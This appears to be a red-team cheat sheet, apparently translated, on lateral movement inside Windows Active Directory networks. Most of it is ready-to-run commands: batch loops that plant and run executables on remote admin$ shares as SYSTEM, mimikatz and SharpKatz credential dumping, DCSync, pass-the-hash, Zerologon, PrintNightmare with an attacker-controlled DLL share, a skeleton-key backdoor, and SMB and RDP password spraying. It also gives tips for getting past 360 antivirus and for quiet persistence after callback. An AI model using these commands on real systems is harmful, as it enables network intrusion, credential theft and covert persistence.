for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "IT1231" & if %errorlevel% equ 0 (copy files64.exe \\%i\admin$\debug\ /Y) & schtasks /create /s "%i" /u "administrator" /p "IT1231" /RL HIGHEST /F /tn "SysDebug" /tr "c:\windows\debug\files64.exe" /sc DAILY /mo 1 /ST 07:25 /RU SYSTEM & schtasks /run /tn SysDebug /s "%i" /U "administrator" /P "IT1231" & schtasks /delete /F /tn SysDebug /s "%i" /U "administrator" /P "IT1231" & @ping 127.0.0.1 -n 1 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\debug\files64.exe /F & net use \\%i\admin$ /del

(2) Straight through WMIC

for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "IT1231" & if %errorlevel% equ 0 (copy files64.exe \\%i\admin$\debug\ /Y) & wmic /NODE:"%i" /user:"administrator" /password:"IT1231" PROCESS call create "c:\windows\debug\files64.exe" & @ping 127.0.0.1 -n 3 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\debug\files64.exe /F & net use \\%i\admin$ /del

(3) Using the SharpKatz tool, with AV-evasion handling:

SharpKatz_x64.exe -h

Example: SharpKatz.exe --Command logonpasswords
Example: SharpKatz.exe --Command ekeys
Example: SharpKatz.exe --Command msv
Example: SharpKatz.exe --Command kerberos
Example: SharpKatz.exe --Command tspkg
Example: SharpKatz.exe --Command credman
Example: SharpKatz.exe --Command wdigest
Example: SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc
Example: SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc
Example: SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc
Example: SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash
Example: SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key
Example: SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash
Example: SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes128 aes256
Example: SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Example: SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Example: SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local
Example: SharpKatz.exe --Command printnightmare --Target dc --Library \\mycontrolled\share\fun.dll
Example: SharpKatz.exe --Command printnightmare --Target dc --Library \\mycontrolled\share\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom
Example: SharpKatz.exe --Command hiveghtmare
Example: SharpKatz.exe --Command dumpsam --System \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM --Sam \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
Example: SharpKatz.exe --Command listshadows

(4) Password decryption for various software:

360 Secure Browser
Chrome decryption
Firefox decryption
FlashFXP decryption
Foxmail mail client decryption
IIS decryption
MobaXterm decryption
Navicat decryption
PL/SQL decryption
Royal TS offline decryption
SecureCRT decryption
SSMS client decryption
Thunderbird offline decryption
TortoiseSVN decryption
VNC decryption
WinSCP decryption
Xshell / Xftp decryption

# MySQL database:

1. Download the target's mysql/data/mysql/user.MYD, mysql/data/mysql/user.frm and mysql/data/mysql/user.MYI back to the local machine

2. Drop them into the corresponding directory of your own MySQL and set the option skip-grant-tables

3. Connect to the database, run select host,user,password from user, and look up the resulting hashes on CMD5

# MSSQL database:

1. mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:. /ntlm:hash /run:\"C:\*\SocksCap64\SocksCap64_RunAsAdmin.exe\"" "exit"

2. Go through the proxy and connect to the MSSQL database directly with Windows authentication

AD domain penetration - lateral movement via WinRM (5985):

Conditions:

1. Applies to Windows 7 and later; disabled by default on Win7 and Server 2008
2. Only Server 2012 and later allow remote management from any host by default
3. Ports 5985 and 5986 not filtered by the firewall


1. Built-in tools:

# Check WinRM status
winrm enumerate winrm/config/listener

# Enable WinRM remote management

Enable-PSRemoting -Force

# Set the WinRM service to start automatically

Set-Service WinRM -StartupType Automatic

# Quick-configure the WinRM service: enables WinRM and the firewall exception, default port 5985

winrm quickconfig -q

# Quick-configure the WinRM service with HTTPS transport, port 5986

winrm quickconfig -transport:https

# View the WinRM configuration

winrm get winrm/config

# View the WinRM listeners

winrm e winrm/config/listener

# Configure authentication for the WinRM service

winrm set winrm/config/service/auth '@{Basic="true"}'

# Change the WinRM default port
winrm set winrm/config/client/DefaultPorts '@{HTTPS="8888"}'

# Set the WinRM service's encryption mode to allow unencrypted traffic:

winrm set winrm/config/service '@{AllowUnencrypted="true"}'

# Only allow the specified IPs to connect to WinRM remotely

winrm set winrm/config/Client '@{TrustedHosts="192.168.10.*"}'

# Execute a command

winrm invoke create wmicimv2/win32_process -SkipCAcheck -skipCNcheck '@{commandline="calc.exe"}'

# Execute a command on the DC, specifying a username and password

winrm invoke Create wmicimv2/win32_process @{CommandLine="calc.exe"} -r:dc -u:one\administrator -p:q123456.


winrs -r:192.168.22.33 -u:administrator -p:p@assw0rd ipconfig

2. https://github.com/Hackplayers/evil-winrm # open-source tool

3. https://github.com/bohops/WSMan-WinRM # a collection of attack implementations, including exe, ps1, js etc.

Usage

SharpWSManWinRM.cs

 Usage: SharpWSManWinRM.exe <hostname> <command>
 Usage: SharpWSManWinRM.exe <hostname> <command> <domain\user> <password>

 Example: SharpWSManWinRM.exe host.domain.local notepad.exe
 Example: SharpWSManWinRM.exe host.domain.local "cmd /c notepad.exe" domain\joe.user P@ssw0rd
 
 
WSManWinRM.ps1

 Usage: Invoke-WSManWinRM -hostname <hostname> -command <command>
 Usage: Invoke-WSManWinRM -hostname <hostname> -command <command> -user <domain\user> -password <password>

 Example: import-module .\WSManWinRM.ps1
          Invoke-WSManWinRM -hostname MyServer.domain.local -command calc.exe
 Example: import-module .\WSManWinRM.ps1
          Invoke-WSManWinRM -hostname MyServer.domain.local -command calc.exe -user domain\joe.user -password P@ssw0rd

WSManWinRM.vbs
 Usage: cscript.exe SharpWSManWinRM.vbs <hostname> <command>
 Usage: cscript.exe SharpWSManWinRM.vbs <hostname> <command> <domain\user> <password>

 Example: cscript.exe SharpWSManWinRM.vbs host.domain.local notepad.exe
 Example: cscript.exe SharpWSManWinRM.vbs host.domain.local "cmd /c notepad.exe" domain\joe.user P@ssw0rd

WSManWinRM.js
 Usage: cscript.exe SharpWSManWinRM.js <hostname> <command>
 Usage: cscript.exe SharpWSManWinRM.js <hostname> <command> <domain\user> <password>

 Example: cscript.exe SharpWSManWinRM.js host.domain.local notepad.exe
 Example: cscript.exe SharpWSManWinRM.js host.domain.local "cmd /c notepad.exe" domain\joe.user P@ssw0rd

CppWSManWinRM.cpp 
Usage: CppWSManWinRM.exe <hostname> <command>

 Example: CppWSManWinRM.exe host.domain.local notepad.exe
 Note: Username/password option does not work yet

AD domain penetration - lateral movement via SMB (445):

# Consolidate every password obtained so far: database passwords, passwords recovered from host hashes, passwords saved in files, etc.

1. Probing with the fscan SMB module:

fscan.exe -hf smb.txt -pf pwd.txt -o smb2win.txt

2. Weak-password check with crack:

for /f "delims=" %i in (smb.txt) do crack.exe -i %i -P pwd.txt -U user.txt >> smb2win.txt

3. Domestic targets, when the proxy is fast enough:

(1) Proxy the weak-password scanning tool into the internal network and scan
(2) Proxy MSF's smb_login in, point it at smb.txt, and scan

AD domain penetration - lateral movement via WMIC (139/135):

Note: (don't let the craft slip: after callback, persist under the user's own privileges, not SYSTEM)

1. Manual way, run SysDebug.exe directly; target 10.10.10.1, username administrator, password loecho@123.., implant SysDebug.exe: (can only be executed once)

net use \\10.10.10.1\admin$ /user:"administrator" "loecho@123.."

copy SysDebug.exe \\10.10.10.1\admin$\debug

wmic /NODE:"10.10.10.1" /user:"administrator" /password:"loecho@123.." PROCESS call create "C:\Windows\Debug\SysDebug.exe"

del \\10.10.10.1\admin$\debug\SysDebug.exe /F

net use \\10.10.10.1\admin$ /del

2. Remote scheduled task

schtasks /create /s "10.10.10.1" /u "administrator" /p "loecho@123.." /RL HIGHEST /F /tn "SysDebug" /tr "c:\windows\debug\SysDebug.exe" /sc DAILY /mo 1 /ST 08:25 /RU SYSTEM

schtasks /query /s "10.10.10.1" /U "administrator" /P "loecho@123.." | findstr "SysDebug"

schtasks /run /tn SysDebug /s "10.10.10.1" /U "administrator" /P "loecho@123.."

schtasks /delete /F /tn SysDebug /s "10.10.10.1" /U "administrator" /P "loecho123.."

3. Lateral movement with WMIHACKER: (https://github.com/rootclay/WMIHACKER/blob/master/README_zh.md)

C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs

__          ____  __ _____   _    _          _____ _  ________ _____
\ \        / /  \/  |_   _| | |  | |   /\   / ____| |/ /  ____|  __ \
 \ \  /\  / /| \  / | | |   | |__| |  /  \ | |    | ' /| |__  | |__) |
  \ \/  \/ / | |\/| | | |   |  __  | / /\ \| |    |  < |  __| |  _  /
   \  /\  /  | |  | |_| |_  | |  | |/ ____ \ |____| . \| |____| | \ \
    \/  \/   |_|  |_|_____| |_|  |_/_/    \_\_____|_|\_\______|_|  \_\
                              v0.6beta       By. Xiangshan@360RedTeam
Usage:
        WMIHACKER.vbs  /cmd  host  user  pass  command GETRES?

        WMIHACKER.vbs  /shell  host  user  pass

        WMIHACKER.vbs  /upload  host  user  pass  localpath remotepath

        WMIHACKER.vbs  /download  host  user  pass  localpath remotepath

          /cmd          single command mode
          host          hostname or IP address
          GETRES?       Res Need Or Not, Use 1 Or 0
          command       the command to run on remote host


Execution with command output

> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1

Without command output

> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0

Simulated shell mode

> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"

File upload: copy the local calc.exe to c:\calc.exe on the remote host

> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"

File download: download the remote host's calc.exe to the local c:\calc.exe

> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"


# Still gets past 360 for now; if it hangs, retry a few times; plain remote command execution is no problem
cscript //nologo wmihacker.vbs /cmd 192.168.159.7 administrator "admin!@#45" "tasklist" 1
cscript //nologo wmihacker.vbs /cmd 192.168.159.19 klion\its "admin!@#45" "query user" 1

# Because the program internally still loops over the results with a batch script, the default call to cmd.exe triggers 360 and no result comes back

WMIcmd.exe -h 192.168.159.19 -u its -p admin!@#45 -d klion -c "systeminfo" -s 50000
WMIcmd.exe -h 192.168.159.7 -u administrator -p admin!@#45 -d . -c "systeminfo" -s 50000

# Redirection cannot be used inside the command; it triggers a 360 alert

cscript wmiexec.vbs /cmd 192.168.159.7 .\administrator admin!@#45 "netstat -ano -wait8000"
cscript wmiexec.vbs /cmd 192.168.159.19 klion\its admin!@#45 "query user -wait8000"

AD domain penetration - lateral movement via RDP (3389)

Suppose a web server in the DMZ has been taken and, after dumping hashes, the password turns out to have this form:
# IP: 10.10.10.130   Password: ABCD130!@.

# Break it down into three parts:

# ABCD  abbreviation of the target company's name

# 130	the last octet of the target system's IP

# !@.	special characters added because of the password policy

# From this one can guess how the administrator passwords of the other machines are built and move laterally with purpose: from web to database, from database to the core...

(2) Lateral RDP spraying with high-privilege users and their passwords
A high-privilege domain user whose plaintext password has been dumped, with port 3389 open:

How to check the RDP port:
# Query 3389 via the registry

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # check whether the RDP service is enabled: 1 = disabled, 0 = enabled

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber  # the RDP service's port


# Via the process

tasklist /svc | find "TermService" # find the PID of the service's process
netstat -ano | find "3220" # find the port belonging to that PID


# Via the listening ports

netstat -ano | findstr LIS # list the current listening ports; in some cases the RDP port has been changed

Forcing the RDP port open:

# Enable via the registry, high-privilege user:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f  # listen on port 3389

# Enable via a registry file, high-privilege user:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d

# Start the RDP service on a remote host via wmic:

wmic /node:"10.10.10.130" /USER:"10.10.10.130\administrator" PATH win32_terminalservicesetting WHERE (__Class!="")

2. Domestic targets, stable network environment:

Proxy the weak-password tool into the internal network and spray passwords against 3389

(Usually the targets that have already been sprayed over SMB are then connected to over 3389 this way)

AD domain penetration - skeleton key:

# A universal password for every user (skeleton); lost on reboot

mimikatz.exe privilege::debug "misc::skeleton"

AD domain penetration - lateral movement through vulnerabilities in the target's various services

(Web N-days, Redis, MSSQL RCE, MySQL privilege escalation)